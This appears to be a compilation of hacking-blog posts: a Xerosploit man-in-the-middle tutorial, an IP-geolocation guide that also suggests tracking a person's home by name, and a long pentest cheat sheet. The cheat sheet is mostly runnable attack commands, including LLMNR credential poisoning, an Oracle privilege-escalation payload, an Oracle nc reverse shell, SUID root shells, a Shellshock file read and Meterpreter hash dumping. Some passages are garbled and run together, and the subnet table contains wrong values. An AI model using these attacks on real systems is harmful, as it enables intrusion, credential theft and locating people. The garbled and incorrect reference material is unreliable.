MITM with Xerosploit

Welcome to hacking a rise i this post we are going to show you how to perform a man in the middle attack with a tool called Xerosploit this tool was designed by LionSec

What is Xerosploit

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realist efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap.

How to install Xerosploit

git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py

Using Xerosploit

Now we have it installed we can now run to but typing xerosploit in terminal

now we type help for the list commands

so are first command is iface tell you your network interface

now we type gateway to check is are gateway is set right

now we look for targets on the network so we now type scan

so the target im picking is my phone 192.168.8.100 so type it in to the terminal

now this bring us to modules so type help

portscanner

: Port Scanner

dos : DoS Attack

ping : Ping Request

injecthtml : Inject Html code

injectjs : Inject Javascript code

rdownload : Replace files being downloaded

sniff : Capturing information inside network packets

MODULES

dspoof : Redirect all the http traffic to the specified one IP

yplay : Play background sound in target browser

replace : Replace all web pages images with your own one

driftnet : View all images requested by your targets

move : Shaking Web Browser content

deface : Overwrite all web pages with your HTML code

we are going to use sniff so type sniffer and then run a little terminal will open up this were are targets data will be displayed

now to cancel press ctrl+c and type back to go back to menu

and all you have to do is pick another module and then run it 🙂 there ya have it lads

Disclamer

Hackingarise does not take responsiblity for the actions you make commit with this tool and/or knowledge!! We make these posts for educational purposes and to teach how hackers can use certain tools to hack you and we do not try to inspire any blackhat activities in the doing of so!!

Final thoughts

Xerosploit is a handy little tool for noobs that dont yet understand the way man in the middle attacks work this script is simple to use and install.

Right lads that’s it hope you enjoyed it and see you in the next one laughingman

Get a location with an IP adress

Get a Location using an IP adress

 

Hey guys ! Lasr here 🙂

Today I’m gonna show you how to get the approximate location of an IP with iplocation.net.

For this tutorial, you will need : A computer/smartphone/tablet with any OS on it, an internet connection and a photo editing software.

SPOILER : you can't get the exact position of someone with such simple tools, if you want his house adress, then make searches on his full name and find his house by his name.

First of all, you need an IP, you can either get it via an IP grabber or via an IP finder (tutorial for a python IP finder here).

Then, go to iplocation.net and put the IP on the text input area on the top (step 1) and click on the “IP Lookup” on the right of the input.

After that, wait until the geolocation data from the three sites below loads. As you can see, we already have 3 locations from the IP; 2 from the same City (Las Vegas) and 1 from New York, why, you might ask, and that’s because the location is closest antenna from the site.

If you just want the country of the guy, then you can stop here, if you want to have his department or his city if you’re lucky enough, then go further.

I will cover 2 techniques :
– the average (better for lines cuz it)
– the triangulation (better for more than 2 points on the map)

1st of, the average, it consists of making the average (thanks captain obvious lmao).
It’s better for 2 points or in some cases when more (when we have points at the start and end of the line but not inside) as in my exemple.

1st Step :
Open this site and put first the latitude in the text input box as shown below. (1)
Then copy the sum (2), open notepad and paste the sum.

Then do the exact same for the Longitude.

2nd Step :

For the 2nd and last step, put the Latitude and Longitude in google maps and see the result.

And boom ! You’re done ! Now let’s get to the 2nd method, the map triangulation.

1st Step :

Open google maps and paste the 1st location, unzoom till you can see the whole country (if the results are from the same country, else unzoom until you can see all of the countries listed on iplocation.net for the IP)
Take a screen, download it, and do the same for all of the other location.

2nd Step :

Then, link all of your results and take the location of the cross made by the lines making a cross.
Red = the 3 locations
Blue = triangulation method
Green = average method

As I said I have a line so this makes this solution not efficient for my case because it’s just a line, and it is a random point in it.

 

If you have a triangle, then make a point in the middle of the 3 lines that you have, and link all of the old points to the new ones as shown below

A, B, C = Location Points

A’, B’, C’ = New Points
F = Point made by the triangulation

If the lines don’t cross and form a triangle, repeat the process.

Hopefully you now know how to find the location of an IP adress ! 🙂

And that’s it, Lasr out !

Pentesters Cheat Sheet Part 1

This is a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test. For more in depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.

The focus of this cheat sheet is infrastructure / network penetration testing, web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For Web Application Penetration Testing, check out the Web Application Hackers Hand Book, it is excellent for both learning and reference.

this was brought to you by john poli modica
find his site here

Pre-engagement

Network Configuration:

Set IP Address.
ifconfig eth0 xxx.xxx.xxx.xxx/24

Subnetting:

ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0

OSINT

Passive Information Gathering:

DNS:

WHOIS enumeration.
whois domain-name-here.com

Perform DNS IP Lookup.
dig a domain-name-here.com @nameserver

Perform MX Record Lookup.
dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG.
dig axfr domain-name-here.com @nameserver

DNS Zone Transfers:
COMMAND DESCRIPTION:

Windows DNS zone transfer.
nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer.
dig axfr blah.com @ns1.blah.com

Email:

Simply Email:
Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.

git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss after gathering.

Semi Active Information Gathering:

Basic Finger Printing:
Manual finger printing / banner grabbing.

COMMAND DESCRIPTION

Basic versioning / finger printing via displayed banner
nc -v 192.168.1.1 25
telnet 192.168.1.1 25

Banner grabbing with NC.
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain

Active Information Gathering

DNS Bruteforce:

DNSRecon:

DNS Enumeration Kali – DNSRecon:

root:# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml

Port Scanning:

Nmap Commands:
For more commands, see the Nmap cheat sheet in another post.

Basic Nmap Commands:

COMMAND DESCRIPTION:
Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services.
nmap -v -sS -A -T4 target

As above but scans all TCP ports (takes a lot longer).
nmap -v -sS -p–A -T4 target

As above but scans all TCP ports and UDP scan (takes even longer).
nmap -v -sU -sS -p- -A -T4 target

Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover.
nmap -v -p 445 –script=smb-check-vulns
–script-args=unsafe=1 192.168.1.X

Search nmap scripts for keywords.
ls /usr/share/nmap/scripts/* | grep ftp

I’ve had a few people mention about T4 scans, apply common sense here. Don’t use T4 commands on external pen tests (when using an Internet connection), you’re probably better off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices, embeded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan for the top 1000 so you can start pen testing then kick off a slower scan.

Nmap UDP Scanning:
nmap -sU TARGET

UDP Protocol Scanner:
git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:
./udp-protocol-scanner.pl -f ip.txt

Scan for a specific UDP service:
udp-proto-scanner.pl -p ntp -f ips.txt

Other Host Discovery
Other methods of host discovery, that don’t use nmap…

COMMAND DESCRIPTION
Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site.
netdiscover -r 192.168.1.0/24

Enumeration & Attacking Network Services:
Penetration testing tools that spefically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration:

Samba Enumeration:

SMB Enumeration Tools:
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U “” target
enum4linux target

Also see, nbtscan cheat sheet in another post.

COMMAND DESCRIPTION:
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain.
nbtscan 192.168.1.0/24

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing.
enum4linux -a target-ip

Fingerprint SMB Version:
smbclient -L //192.168.1.100

Find open SMB Shares:
nmap -T4 -v -oA shares –script smb-enum-shares –script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Enumerate SMB Users:
nmap -sU -sS –script=smb-enum-users -p U:137,T:139 192.168.11.200-254

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID Cycling:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid

Manual Null session testing:
Windows:
net use \\TARGET\IPC$ “” /u:””

Linux:
smbclient -L //192.168.99.131

NBTScan unixwiz
Install on Kali rolling:

apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoofing:
Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests
Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture the hashes:

auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py:
Alternatively you can use responder.

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0

Run Responder.py for the whole engagement
Run Responder.py for the length of the engagement while you’re working on other attack vectors.

SNMP Enumeration Tools:
A number of SNMP enumeration tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo “” > /etc/snmp/snmp.conf

COMMAND DESCRIPTION:
SNMP enumeration.
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMPv3 Enumeration Tools
Idenitfy SNMPv3 servers with nmap:
nmap -sV -p 161 –script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the
username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb

*Use Metasploits Wordlist
Metasploit’s wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler’s SecLists project on GitHub (not the mailing list!).

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration:
This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration
RSH Run Commands:
rsh

Metasploit RSH Login Scanner:
auxiliary/scanner/rservices/rsh_login

rusers Show Logged in Users:
rusers -al 192.168.2.1

rusers scan whole Subnet:
rlogin -l

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration:
finger @TARGET-IP

Finger a Specific Username:
finger batman@TARGET-IP

Solaris bug that shows all logged in users:
finger 0@host

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger ‘a b c d e f g h’@sunhost

rwho:
Use nmap to identify machines running rwhod (513 UDP).

TLS & SSL Testing:

testssl.sh:

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html

Vulnerability Assessment:
Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:
netstat -tulpn

Login at https://127.0.0.1:9392 – credentials are generated during openvas-setup.

Database Penetration Testing:
Attacking database servers exposed on the network.

Oracle:
Install oscanner:
apt-get install oscanner

Run oscanner:
oscanner -s 192.168.1.200 -P 1521

Fingerprint Oracle TNS Version:

Install tnscmd10g:
apt-get install tnscmd10g

Fingerprint oracle tns:
tnscmd10g version -h TARGET
nmap –script=oracle-tns-version

Brute force oracle user accounts
Identify default Oracle accounts:
nmap –script=oracle-sid-brute
nmap –script=oracle-brute

Run nmap scripts against Oracle TNS:
nmap -p 1521 -A TARGET

Oracle Privilege Escalation:
Requirements:

-Oracle needs to be exposed on the network
-A default account is in use like scott

Quick overview of how this works:

1 Create the function

2 Create an index on table SYS.DUAL

3 The index we just created executes our function SCOTT.DBA_X

4 The function will be executed by SYS user (as that’s the user that owns the table).
5 Create an account with DBA priveleges

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:
nmap –script=oracle-sid-brute
nmap –script=oracle-brute

Login using the identified weak account (assuming you find one).

How to identify the current privilege level for an oracle user:
SQL> select * from session_privs;

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid
curren_user is
pragma autonomous_transaction;
begin
execute immediate ‘grant dba to user1 identified by pass1’;
commit;
return ‘FOO’;
end;

Oracle priv esc and obtain DBA access:
Run netcat:
netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA(‘BAR’));
Run the exploit with a select query:
SQL> Select * from session_privs;
You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:
drop index exploit_1337;

Get Oracle Reverse os-shell:
begin
dbms_scheduler.create_job( job_name => ‘MEH1337’,job_type =>
‘EXECUTABLE’,job_action => ‘/bin/nc’,number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 1, ‘TARGET-IP’);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 2, ‘443’);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 3, ‘-e’);
dbms_scheduler.set_job_argument_value(‘rev_shell’, 4, ‘/bin/bash’);
dbms_scheduler.enable(‘rev_shell’);
end;

MSSQL:
Enumeration / Discovery:

Nmap:
nmap -sU –script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:
msf > use auxiliary/scanner/mssql/mssql_ping

*Use MS SQL Servers Browse For More:
Try using “Browse for More” via MS SQL Server Management Studio.

Bruteforce MSSQL Login:
msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell:
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Network:
Plink.exe Tunnel:
PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw “1337” -R 445:127.0.0.1:445 REMOTE-IP

Pivoting:

SSH Pivoting:
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting:
TTL Finger Printing:
OPERATING SYSTEM TTL SIZE
Windows 128

Linux 64

Solaris 255

Cisco / Network 255

IPv4 Cheat Sheets:
Classful IP Ranges:
E.g Class A,B,C (depreciated)

CLASS IP ADDRESS RANGE
Class A IP Address Range 0.0.0.0 – 127.255.255.255
Class B IP Address Range 128.0.0.0 – 191.255.255.255
Class C IP Address Range 192.0.0.0 – 223.255.255.255
Class D IP Address Range 224.0.0.0 – 239.255.255.255
Class E IP Address Range 240.0.0.0 – 255.255.255.255

IPv4 Private Address Ranges:
CLASS RANGE
Class A Private Address Range 10.0.0.0 – 10.255.255.255
Class B Private Address Range 172.16.0.0 – 172.31.255.255
Class C Private Address Range 192.168.0.0 – 192.168.255.255
127.0.0.0 – 127.255.255.255

IPv4 Subnet Cheat Sheet:
Subnet cheat sheet, not really realted to pen testing but a useful reference.

CIDR DECIMAL MASK NUMBER OF HOSTS
/31 255.255.255.254 1 Host
/30 255.255.255.252 2 Hosts
/29 255.255.255.249 6 Hosts
/28 255.255.255.240 4 Hosts
/27 255.255.255.224 30 Hosts
/26 255.255.255.192 62 Hosts
/25 255.255.255.128 126 Hosts
/24 255.255.255.0 254 Hosts
/23 255.255.254.0 512 Host
/22 255.255.252.0 1022 Hosts
/21 255.255.248.0 2046 Hosts
/20 255.255.240.0 4094 Hosts
/19 255.255.224.0 8190 Hosts
/18 255.255.192.0 16382 Hosts
/17 255.255.128.0 32766 Hosts
/16 255.255.0.0 65534 Hosts
/15 255.254.0.0 131070 Hosts
/14 255.252.0.0 262142 Hosts
/13 255.248.0.0 524286 Hosts
/12 255.240.0.0 1048674 Hosts
/11 255.224.0.0 2097150 Hosts
/10 255.192.0.0 4194302 Hosts
/9 255.128.0.0 8388606 Hosts
/8 255.0.0.0 16777214 Hosts

VLAN Hopping:
Using NCCGroups VLAN wrapper script for Yersina simplifies the process.

git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh

VPN Pentesting Tools:
Identify VPN servers:
./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce:
Use IKEForce to enumerate or dictionary attack VPN servers.

Install:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP –id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking:
1 Identify VPN Servers
2 Enumerate with IKEForce to obtain the group ID
3 Use ike-scan to capture the PSK hash from the IKE endpoint
4 Use psk-crack to crack the hash

Step 1: Idenitfy IKE Servers
./udp-protocol-scanner.pl -p ike SUBNET/24

Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP

Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt

Some more advanced psk-crack options below:

pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 –charset=”01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz” 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking:
Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)

PPTP Dictionary Attack:
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS Tunneling:
Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine:

Installtion:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

dnscat –host

BOF / Exploit:
Exploit Research:
Find exploits for enumerated hosts / services.

COMMAND DESCRIPTION:
Search exploit-db for exploit, in this example windows 2003 + local esc.
searchsploit windows 2003 | grep -i local

Use google to search exploit-db.com for exploits
site:exploit-db.com exploit kernel <= 3Search metasploit modules using grep - msf search sucks a bitgrep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*Searching for Exploits:Install local copy of exploit-db:searchsploit –usearchsploit apache 2.2searchsploit "Linux Kernel"searchsploit linux 2.6 | grep -i ubuntu | grep localCompiling Windows Exploits on Kali:wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/downloadwine mingw-get-setup.exeselect mingw32-basecd /root/.wine/drive_c/windowswget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zipcd /root/.wine/drive_c/MinGW/binwine gcc -o ability.exe /tmp/exploit.c -lwsock32wine ability.exe Cross Compiling Exploits:gcc -m32 -o output32 hello.c (32 bit)gcc -m64 -o output hello.c (64 bit)Exploiting Common Vulnerabilities:Exploiting Shellshock:A tool to find and exploit servers vulnerable to Shellshock:git clone https://github.com/nccgroup/shocker./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbosecat file (view file contents):echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$( 80, :DocumentRoot => Dir.pwd).start”

Run a basic PHP http server
php -S 0.0.0.0:80

Mounting File Shares:
How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION
Mount NFS share to /mnt/nfs.
mount 192.168.1.1:/vol/share /mnt/nfs

Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history).
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs

Mount a Windows share on Windows from the command line.
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no

apt-get install smb4k -y

Install smb4k on Kali, useful Linux GUI for browsing SMB shares.

HTTP / HTTPS Webserver Enumeration:
COMMAND DESCRIPTION:
Perform a nikto scan against target.
nikto -h 192.168.1.1

Configure via GUI, CLI input doesn’t work most of the time.
dirbuster

Packet Inspection:
COMMAND DESCRIPTION:
tcpdump for port 80 on interface eth0, outputs to output.pcap
tcpdump tcp port 80 -w output.pcap -i eth0

Username Enumeration:
Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration:
COMMAND DESCRIPTION:
Enumerate users from SMB.
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID cycle SMB / enumerate users from SMB.
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

SNMP User Enumeration:
COMMAND DESCRIPTION:
Enmerate users from SNMP.
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4

Enmerate users from SNMP.
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX

Search for SNMP servers with nmap, grepable output.
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)

Passwords:
Wordlists:
COMMAND DESCRIPTION:
Kali worlists.
/usr/share/wordlists

Brute Forcing Services:
Hydra FTP Brute Force.
COMMAND DESCRIPTION:
Hydra FTP brute force.
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V

Hydra POP3 Brute Force:
COMMAND DESCRIPTION:
Hydra POP3 brute force.
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V

Hydra SMTP Brute Force:
COMMAND DESCRIPTION:
Hydra SMTP brute force.
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V

Use -t to limit concurrent connections, example: -t 15

Password Cracking:
Password cracking penetration testing tools.

John The Ripper – JTR:
COMMAND DESCRIPTION:
JTR password cracking.
john –wordlist=/usr/share/wordlists/rockyou.txt hashes

JTR forced descrypt cracking with wordlist.
john –format=descrypt –wordlist
/usr/share/wordlists/rockyou.txt hash.txt

JTR forced descrypt brute force cracking.
john –format=descrypt hash –show

Windows Penetration Testing Commands:
See Windows Penetration Testing Commands.

Linux Penetration Testing Commands
See Linux Commands Cheat Sheet in another post for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits
Some notes on compiling exploits.

Identifying if C code is for Windows or Linux:
C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION:
Windows exploit code.
process.h, string.h, winbase.h, windows.h, winsock2.h

Linux exploit code.
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h

Build Exploit GCC:
Compile exploit gcc.

COMMAND DESCRIPTION:
Basic GCC compile.
gcc -o exploit exploit.c

GCC Compile 32Bit Exploit on 64Bit Kali:
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

COMMAND DESCRIPTION:
Cross compile 32 bit binary on 64 bit Linux
gcc -m32 exploit.c -o exploit

Compile Windows .exe on Linux:
Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND DESCRIPTION:
Compile windows .exe on Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

SUID Binary:
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash:

int main(void){
setresuid(0, 0, 0);
system(“/bin/bash”);
}

SUID C Shell for /bin/sh:
int main(void){
setresuid(0, 0, 0);
system(“/bin/sh”);
}

Building the SUID Shell binary:
gcc -o suid suid.c

For 32 bit:
gcc -m32 -o suid suid.c

Reverse Shells:
See Reverse Shell Cheat Sheet in another posts for a list of useful Reverse Shells.

TTY Shells:
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
echo os.system(‘/bin/bash’)

Spawn Interactive sh shell:
/bin/sh -i

Spawn Perl TTY Shell:
exec “/bin/sh”;
perl —e ‘exec “/bin/sh”;’

Spawn Ruby TTY Shell:
exec “/bin/sh”

Spawn Lua TTY Shell:
os.execute(‘/bin/sh’)

Spawn TTY Shell from Vi:
Run shell commands from vi:
:!bash

Spawn TTY Shell NMAP:
!sh

Metasploit Cheat Sheet:
A basic metasploit cheat sheet that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads:
Windows reverse meterpreter payload:
COMMAND DESCRIPTION:
Windows reverse tcp payload.
set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload:
COMMAND DESCRIPTION:
Meterpreter Windows VNC Payload.
set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux Reverse Meterpreter payload:
COMMAND DESCRIPTION:
Meterpreter Linux Reverse Payload.
set payload linux/meterpreter/reverse_tcp

Meterpreter Cheat Sheet:
Useful meterpreter commands.

COMMAND DESCRIPTION:
Meterpreter upload file to Windows target.
upload file c:\\windows

Meterpreter download file from Windows target.
download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target.
download c:\\windows\\repair\\sam /tmp

Meterpreter run .exe on target – handy for executing uploaded exploits.
execute -f c:\\windows\temp\exploit.exe

Creates new channel with cmd shell.
execute -f cmd -c

Meterpreter show processes.
ps

Meterpreter get shell on the target.
shell

Meterpreter attempts priviledge escalation the target.
getsystem

Meterpreter attempts to dump the hashes on the target.
hashdump

Meterpreter create port forward to target machine.
portfwd add –l 3389 –p 3389 –r target

Meterpreter delete port forward.
portfwd delete –l 3389 –p 3389 –r target

Common Metasploit Modules:
Top metasploit modules.

Remote Windows Metasploit Modules (exploits)
COMMAND DESCRIPTION:
MS08_067 Windows 2k, XP, 2003 Remote Exploit.
use exploit/windows/smb/ms08_067_netapi

MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit.
use exploit/windows/dcerpc/ms06_040_netapi

MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit.
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Local Windows Metasploit Modules (exploits):
COMMAND DESCRIPTION:
Bypass UAC on Windows 7 + Set target + arch, x86/64
use exploit/windows/local/bypassuac

Auxilary Metasploit Modules:
COMMAND DESCRIPTION:
Metasploit HTTP directory scanner.
use auxiliary/scanner/http/dir_scanner

Metasploit JBOSS vulnerability scanner.
use auxiliary/scanner/http/jboss_vulnscan

Metasploit MSSQL Credential Scanner.
use auxiliary/scanner/mssql/mssql_login

Metasploit MSSQL Version Scanner.
use auxiliary/scanner/mysql/mysql_version

Metasploit Oracle Login Module.
use auxiliary/scanner/oracle/oracle_login

Metasploit Powershell Modules:
COMMAND DESCRIPTION:
Metasploit powershell payload delivery module.
use exploit/multi/script/web_delivery

Metasploit upload and run powershell script through a session.
post/windows/manage/powershell/exec_powershell

Metasploit JBOSS deploy.
use exploit/multi/http/jboss_maindeployer

Metasploit MSSQL payload.
use exploit/windows/mssql/mssql_payload

Post Exploit Windows Metasploit Modules:
Windows Metasploit Modules for privilege escalation.

COMMAND DESCRIPTION:
Metasploit show privileges of current user.
run post/windows/gather/win_privs

Metasploit grab GPP saved passwords.
use post/windows/gather/credentials/gpp

Metasplit load Mimikatz.
load mimikatz -> wdigest

Identify other machines that the supplied domain user has administrative access to.
run post/windows/gather/local_admin_search_enum

Automated dumping of sam file, tries to esc privileges etc.
run post/windows/gather/smart_hashdump

ASCII Table Cheat Sheet:
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII CHARACTER
x00 Null Byte

x08 BS

x09 TAB

x0a LF

x0d CR

x1b ESC

x20 SPC

x21 !

x22 ”

x23 #

x24 $

x25 %

x26 &

x27 `

x28 (

x29 )

x2a *

x2b +

x2c ,

x2d –

x2e .

x2f /

x30 0

x31 1

x32 2

x33 3

x34 4

x35 5

x36 6

x37 7

x38 8

x39 9

x3a :

x3b ;

x3c

x3f ?

x40 @

x41 A

x42 B

x43 C

x44 D

x45 E

x46 F

x47 G

x48 H

x49 I

x4a J

x4b K

x4c L

x4d M

x4e N

x4f O

x50 P

x51 Q

x52 R

x53 S

x54 T

x55 U

x56 V

x57 W

x58 X

x59 Y

x5a Z

x5b [

x5c \

x5d ]

x5e ^

x5f _

x60 `

x61 a

x62 b

x63 c

x64 d

x65 e

x66 f

x67 g

x68 h

x69 i

x6a j

x6b k

x6c l

x6d m

x6e n

x6f o

x70 p

x71 q

x72 r

x73 s

x74 t

x75 u

x76 v

x77 w

x78 x

x79 y

x7a z

CISCO IOS Commands:
A collection of useful Cisco IOS commands.

COMMAND DESCRIPTION:
Enters enable mode.
enable

Short for, configure terminal.
conf t

Configure FastEthernet 0/0.
(config)# interface fa0/0

Add ip to fa0/0.
(config-if)# ip addr 0.0.0.0 255.255.255.255

Configure vty line.
(config-if)# line vty 0 4

Cisco set telnet password.
(config-line)# login

Set telnet password
(config-line)# password YOUR-PASSWORD

Show running config loaded in memory.
# show running-config

Show startup config.
# show startup-config

show cisco IOS version.
# show version

